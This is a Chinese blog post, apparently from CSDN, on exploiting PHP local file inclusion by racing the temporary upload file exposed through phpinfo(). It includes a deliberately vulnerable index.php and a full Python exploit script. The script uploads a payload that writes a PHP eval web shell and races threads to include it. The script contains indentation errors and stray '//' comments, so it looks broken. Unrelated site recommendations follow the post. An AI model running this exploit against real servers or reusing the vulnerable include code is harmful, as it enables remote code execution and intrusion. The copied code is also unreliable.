文件包含奇技淫巧

于 2024-08-29 09:15:29 发布
阅读量94 收藏 2
点赞数 3
文章标签: php 学习 渗透 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/banliyaoguai/article/details/141650497
版权

未完成

一个项目中遇到的漏洞

环境搭建

index.php

<?php
$a = @$_GET['file'];
echo 'include $_GET[\'file\']';
if (strpos($a,'flag')!==false) {
die('nonono');
}
include $a;
?>

phpinfo.php

<?php
phpinfo();
?>

代码分析

首先我们要读取flag,想要直接include包含flag,但是flag被过滤了。然后想要使用php://input也无法使用因为。allow_url_fopen、allow_url_include这两个属性没有都On

然后dir是进行目录扫描的,扫描我们的临时文件。看到临时文件我们可以有这个么思路,我们可以在生成临时文件的时候进行竞争,在没删掉之前就包含成功。或者在生成临时文件的时候让那个php文件停下来。

在这里有一个phpinfo的页面

这里有一个想法就是在header头部填充数据,然后phpinfo会打印我们的header头部,这样让进程走的慢一些,然后在没打印完成时是不会删除临时文件的。然后我们想办法包含这个文件就可以了。这里是一个线程不停的在phpinfo发送垃圾数据,一个线程在index.php不断地包含文件。

脚本

#!/usr/bin/python
import sys
import threading
import socket
import time


def setup(host, port):
    TAG = "Security Test"
    PAYLOAD = """%s\r
	<?php fputs(fopen('../../shellaaaaa.php','w'),'<?php @eval($_POST[a]);')?>\r""" % TAG
    REQ1_DATA = """-----------------------------7dbff1ded0714\r
    Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
    Content-Type: text/plain\r
    \r
    %s
    -----------------------------7dbff1ded0714--\r""" % PAYLOAD
    padding = "A" * 5000
    REQ1 = """POST /phpinfo.php?a=""" + padding + """ HTTP/1.1\r
    Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie=""" + padding + """\r
    HTTP_ACCEPT: """ + padding + """\r
    HTTP_USER_AGENT: """ + padding + """\r
    HTTP_ACCEPT_LANGUAGE: """ + padding + """\r
    HTTP_PRAGMA: """ + padding + """\r
    Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
    Content-Length: %s\r
    Host: %s\r
    \r
    %s""" % (len(REQ1_DATA), host, REQ1_DATA)
        # modify this to suit the LFI script
        LFIREQ = """GET /lfi.php?file=%s HTTP/1.1\r
    User-Agent: Mozilla/4.0\r
    Proxy-Connection: Keep-Alive\r
    Host: %s\r
    \r
    \r
    """
    return (REQ1, TAG, LFIREQ)


def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s.connect((host, port))
    s2.connect((host, port))

    s.send(phpinforeq)
    d = ""
    while len(d) < offset:
        d += s.recv(offset)
    try:
        i = d.index("[tmp_name] =&gt; ")
        fn = d[i + 17:i + 44]
    except ValueError:
        return None

    s2.send(lfireq % (fn, host))
    d = s2.recv(4096)
    s.close()
    s2.close()

    if d.find(tag) != -1:
        return fn


counter = 0


class ThreadWorker(threading.Thread):
    def __init__(self, e, l, m, *args):
        threading.Thread.__init__(self)
        self.event = e
        self.lock = l
        self.maxattempts = m
        self.args = args
//shell运行成功会到这里
    def run(self):
        global counter
        while not self.event.is_set():
            with self.lock:
                if counter >= self.maxattempts:
                    return
                counter += 1

            try:
                x = phpInfoLFI(*self.args)
                if self.event.is_set():
                    break
                if x:
                    print "\nGot it! Shell created in /tmp/g"
                    self.event.set()

            except socket.error:
                return


def getOffset(host, port, phpinforeq):
    """Gets offset of tmp_name in the php output"""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(phpinforeq)

    d = ""
    while True:
        i = s.recv(4096)
        d += i
        if i == "":
            break
        # detect the final chunk
        if i.endswith("0\r\n\r\n"):
            break
    s.close()
    i = d.find("[tmp_name] =&gt; ")
    if i == -1:
//临时文件没找到
        raise ValueError("No php tmp_name in phpinfo output")

    print "found %s at %i" % (d[i:i + 10], i)
    # padded up a bit
    return i + 256


def main():
    print "LFI With PHPInfo()"
    print "-=" * 30

    if len(sys.argv) < 2:
        print "Usage: %s host [port] [threads]" % sys.argv[0]
        sys.exit(1)

    try:
        host = socket.gethostbyname(sys.argv[1])
    except socket.error, e:
        print "Error with hostname %s: %s" % (sys.argv[1], e)
        sys.exit(1)

    port = 80
    try:
        port = int(sys.argv[2])
    except IndexError:
        pass
    except ValueError, e:
        print "Error with port %d: %s" % (sys.argv[2], e)
        sys.exit(1)

    poolsz = 10
    try:
        poolsz = int(sys.argv[3])
    except IndexError:
        pass
    except ValueError, e:
        print "Error with poolsz %d: %s" % (sys.argv[3], e)
        sys.exit(1)

    print "Getting initial offset...",
    reqphp, tag, reqlfi = setup(host, port)
    offset = getOffset(host, port, reqphp)
    sys.stdout.flush()

    maxattempts = 1000
    e = threading.Event()
    l = threading.Lock()

    print "Spawning worker pool (%d)..." % poolsz
    sys.stdout.flush()

    tp = []
    for i in range(0, poolsz):
        tp.append(ThreadWorker(e, l, maxattempts, host, port, reqphp, offset, reqlfi, tag))

    for t in tp:
        t.start()
    try:
        while not e.wait(1):
            if e.is_set():
                break
            with l:
                sys.stdout.write("\r% 4d / % 4d" % (counter, maxattempts))
                sys.stdout.flush()
                if counter >= maxattempts:
                    break
        print
        if e.is_set():
            print "Woot!  \m/"
        else:
            print ":("
    except KeyboardInterrupt:
        print "\nTelling threads to shutdown..."
        e.set()

    print "Shuttin' down..."
    for t in tp:
        t.join()


if __name__ == "__main__":
    main()

板栗妖怪
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUGKU-WEB 文件包含
天泽岁月
02-22 1378
BUGKU-WEB 文件包含PHP伪协议
Git 的奇技淫巧
物联网布道师
09-28 413
最新的放在最上面。
奇技淫巧
weixin_33805992的博客
05-13 470
0.如果不是秒切的话,解决问题的一般思路: 1.退而求其次:如果数据小、没有某个限制怎么办?(可以通过暴力分得到提示) 2.找到矛盾问题的根源,就是算法升级的关键,如果有了这个限制,怎么处理? 3.集中处理这个矛盾 本篇博文记录一些机智操作,简洁方法,奇技淫巧。 1.快读: void read(int &x) { char ch;bool flag=...
奇技淫巧之cmake
itas109的专栏
11-02 1252
奇技淫巧之cmake 如需转载请标明出处:http://blog.csdn.net/itas109 QQ技术交流群:129518033 文章目录奇技淫巧之cmake前言0.cmake常用配置及信息展示1.mingw(gcc)生成MSVC(vs)可用的dll(.lib)2.qt调试cmake工程3.cmake下载和编译其他工程3.1 FetchContent_MakeAvailable3.2 add_custom_target4.安装编译文件5.解决-fPIC问题5.1 修改原始CMakeLists.tx
Python奇技淫巧
web开发与Python
07-17 1026
本文用作记录,在使用python过程中遇到的一些奇技淫巧,有些代码是本人所写,有些则是python内置函数,有些则取之互联网。在此记录,只为备份以及遗忘时方便查找。 本文将会持续更新,内容仅限记录一些常用好用却又永远记不住的代码或者模块。 控制台操作 控制台不闪退 os.system('pause') 获取控制台大小 rows, columns = os.popen('stty size',...
Python 奇技淫巧
Alex
04-23 944
本文用作记录,在使用python过程中遇到的一些奇技淫巧,有些代码是本人所写,有些则是python内置函数,有些则取之互联网,在此记录,只为备份以及遗忘时方便查找。 本文将会持续更新,内容仅限记录一些常用好用却又永远记不住的代码或者模块。 控制台操作 控制台不闪退: os.system('pause') 获取控制台大小: rows, columns = os.popen('stty siz...
DWR 奇技淫巧 之JavaScript 文件包含
践行渐知 渐知践行
07-20 119
如果您使用dwr 是否为配置了创建器后还要在用到的jsp文件头中写包含JavaScript文件烦恼呢 本文分享一个技巧,把下面代码加入jsp的头部,以后再用不着一个个写了,直接用就行 &lt;%@ page pageEncoding="utf-8"%&gt; &lt;%@page import="org.directwebremoting.impl.*,java.util.*"%&gt; ...
ctfshow web入门(文件包含
qq_53263789的博客
07-19 689
ctfshow
Cunning:奇技淫巧
04-14
在IT领域,"奇技淫巧"通常是指一些非传统或者独特的方法,这些方法可能不常见,但能高效地解决特定问题。在这个场景中,提到的是Python编程的一些巧妙技巧,包括处理Excel数据以及使用gdspy进行图形绘制。下面将详细...
来自小密圈里的那些奇技淫巧.pdf
08-08
标题中提到的“来自小密圈里的那些奇技淫巧”可能是指在特定的技术圈子中分享的一些特殊技巧,用于突破安全限制和进行有效的攻击测试。以下将详细解释文档中提及的各个技巧: 1. EVAL长度限制突破技巧: 在PHP中,`...
Git的奇技淫巧
08-10
此外,`git add -p`允许你在提交时选择要包含的更改块,这对于精细化控制提交内容非常有用。 在JavaScript开发中,`gitignore`文件至关重要,它可以帮助你排除不希望版本化的文件(如日志、编译后的文件或第三方库...
bash奇技淫巧
04-29
这时第二个窗口的历史记录只包含了原始的400条命令,而不是包括最新的100条命令在内的所有命令。 为了解决这个问题,可以采取以下措施: - **使用共享历史**:通过设置`HISTCONTROL=ignoreboth`和`shopt -s ...
Java 8中Stream API的这些奇技淫巧!你Get了吗?
08-25
Java 8 中 Stream API 的奇技淫巧 Java 8 中的 Stream API 是一种功能强大且实用的数据处理工具,能够帮助开发者更高效地处理数据。Stream API 的出现是为了解决 Java 中处理数据的痛点,提供了一种简洁、灵活、...
抽奖系统PHP源码开源二开版带完整后台
最新发布
jiyc2008的博客
08-28 113
抽奖系统源码是一个以php MySQL进行开发的手机抽奖系统源码。用途:适合做推广营销、直播、粉丝抽奖。1、后台可以设置每个抽奖用户的抽奖次数,后台添加设置奖品,适和企业和商场搞活动,后台添加用户,才能抽奖。经过电脑管家、网站安全狗扫描特征码,没有发现可疑文件,请放心使用。该程序可以作为活动氛围活动气氛的烘托作用,活动游戏而已!3、后台可以设置每个奖品的中奖概率,中奖概率采用百分制。2、后台可以添加上传抽奖商品图片和奖品名称。测试环境:php5.6 Mysql。4、会员前台可以查询中奖记录。
upload-labs(Pass-18 ~ Pass-21)
m0_64849639的博客
08-23 973
所以我们只要上传的文件后缀不是白名单中的,该文件就还是会被删除2、思路:由于该文件后缀不是白名单中的,该文件就还是会被删除;但是,服务器删除该php文件是有一定的延迟的,若我们在这延迟中访问了该php代码,那么就会在当前目录生成shell.php文件3、实践:(1)、抓包进入爆破模块:(2)发包:此时就在源源不断的上传文件1.php,服务器也在一直删除该文件;
第三章 封装与继承
weixin_65279640的博客
08-28 837
面向对象三大特征之一 ——封装概念:将类的某些信息隐藏在类内部,不允许外部程序直接访问,而是通过该类提供的方法来实现对隐藏信息的操作和访问把尽可能多的东西藏起来,对外提供便捷的接口。说白了就是把对象中的属性信息封装在对象类内部,不让用户直接使用类属性进行访问,而是定义一个方法作为类属性的接口提供给用户访问使用。封装的两个大致原则把所有的属性藏起来把尽可能多的东西藏起来,对外提供便捷的接口。
Upload-Lab第20关:如何利用文件名可控漏洞?
didiplus
08-27 238
在Upload-Lab的第20关中,系统没有对上传文件的内容进行验证,而是仅对用户输入的文件名进行了检查。具体来说,系统使用文件后缀名的黑名单进行过滤,但由于上传的文件名是用户可控的,这为绕过机制提供了可能性。此外,函数还有一个特性,即它会忽略文件名末尾的/.,这可以被利用来绕过后缀名的黑名单检查,从而上传恶意文件。通过这一关的学习,我们可以深入理解 Apache 配置文件的作用及其在安全防护中的重要性。同时,这也提醒我们在设计和开发上传功能时,必须考虑到所有可能的攻击面,确保服务器配置的安全性和稳健性。
使用 Puppeteer 在 PHP 中解决 reCAPTCHA 以进行网页抓取
weixin_68994939的博客
08-28 741
为了让您了解一些背景信息,reCAPTCHA 是一种旨在保护网站免遭自动化滥用的系统。它要求用户完成对人类来说很容易但对机器人来说很困难的任务,例如识别图像中的物体或选中一个框。虽然这些挑战对于安全来说非常有用,但它们对于网页抓取来说却很麻烦。:此版本以“我不是机器人”复选框和基于图像的挑战而闻名。用户可能需要点击图像或完成特定操作来证明他们不是机器人。它在区分真实用户和机器人方面非常有效。:此版本在后台运行。它不直接要求用户交互,而是分析用户在整个网站上的行为,并分配一个风险评分。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值